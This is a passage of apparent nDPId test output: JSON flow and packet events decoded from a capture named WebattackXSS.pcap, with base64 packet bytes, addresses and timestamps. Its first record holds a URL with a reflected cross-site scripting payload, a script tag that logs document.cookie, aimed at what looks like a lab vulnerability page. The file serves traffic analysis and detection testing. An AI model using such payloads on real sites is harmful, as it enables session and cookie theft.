{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":3,"flow_last_seen":1499347943147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347943147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TwRAAD4GdtSsEAABwKgKMoYOAFBjnu+FE+7OhoAQAOUrTgAAAQEICgE8oIgD5nH8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347944440,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347944440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SUNAAD4GfI2sEAABwKgKMoYcAFB5iuiIAAAAAKACchDTfAAAAgQFtAQCCAoBPKHLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":2,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhhyVeGrjeYroiaAScSBc2gAAAgQFtAQCCAoD5nM\/ATyhywEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":3,"flow_last_seen":1499347944441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347944441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SURAAD4GfJSsEAABwKgKMoYcAFB5iuiJlXhq5IAQAOX74QAAAQEICgE8ocsD5nM\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347945720,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347945720,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sjdAAD4GE5msEAABwKgKMoYqAFDdpBE8AAAAAKACchBFYQAAAgQFtAQCCAoBPKMLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhiqh1kGM3aQRPaAScSDqdwAAAgQFtAQCCAoD5nR\/ATyjCwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":1499347945721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347945721,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sjhAAD4GE6CsEAABwKgKMoYqAFDdpBE9odZBjYAQAOWJfwAAAQEICgE8owsD5nR\/"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347948293,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347948293,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMoZEAFDGn7d3AAAAAKACchCzjQAAAgQFtAQCCAoBPKWOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":2,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhkRGWOs1xp+3eKAScSAH9gAAAgQFtAQCCAoD5ncCATyljgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":3,"flow_last_seen":1499347948294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347948294,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMoZEAFDGn7d4RljrNoAQAOWm\/QAAAQEICgE8pY4D5ncC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347949587,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347949587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QMNAAD4GhQ2sEAABwKgKMoZSAFBj7eYSAAAAAKACchDmUwAAAgQFtAQCCAoBPKbRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":2,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhlIJuXRqY+3mE6AScSDs4gAAAgQFtAQCCAoD5nhGATym0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":3,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QMRAAD4GhRSsEAABwKgKMoZSAFBj7eYTCbl0a4AQAOWL6QAAAQEICgE8ptID5nhG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347952161,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347952161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8St5AAD4GevKsEAABwKgKMoZsAFCk\/OOLAAAAAKACchClLQAAAgQFtAQCCAoBPKlVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":2,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhmwNHcNepPzjjKAScSBW4QAAAgQFtAQCCAoD5nrJATypVQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":3,"flow_last_seen":1499347952162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347952162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0St9AAD4GevmsEAABwKgKMoZsAFCk\/OOMDR3DX4AQAOX16AAAAQEICgE8qVUD5nrJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347953439,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347953439,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+l9AAD4Gy3CsEAABwKgKMoZ6AFBhTFDKAAAAAKACchB6UQAAAgQFtAQCCAoBPKqVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":2,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhnpvVsdUYUxQy6AScSDElQAAAgQFtAQCCAoD5nwJATyqlQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":3,"flow_last_seen":1499347953440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347953440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+mBAAD4Gy3esEAABwKgKMoZ6AFBhTFDLb1bHVYAQAOVjnQAAAQEICgE8qpUD5nwJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347954738,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347954738,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a+xAAD4GWeSsEAABwKgKMoaIAFCY\/8A1AAAAAKACchDR4AAAAgQFtAQCCAoBPKvZAAAAAAEDAwc="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":2,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhoh\/\/ieLmP\/ANqAScSCqAQAAAgQFtAQCCAoD5n1OATyr2QEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":3,"flow_last_seen":1499347954739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347954739,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a+1AAD4GWeusEAABwKgKMoaIAFCY\/8A2f\/4njIAQAOVJCAAAAQEICgE8q9oD5n1O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347957282,"flow_last_seen":1499347957282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957282,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1499347957282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957282,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82nJAAD4G612sEAABwKgKMoaiAFCv93QkAAAAAKACchAEYwAAAgQFtAQCCAoBPK5WAAAAAAEDAwc="} 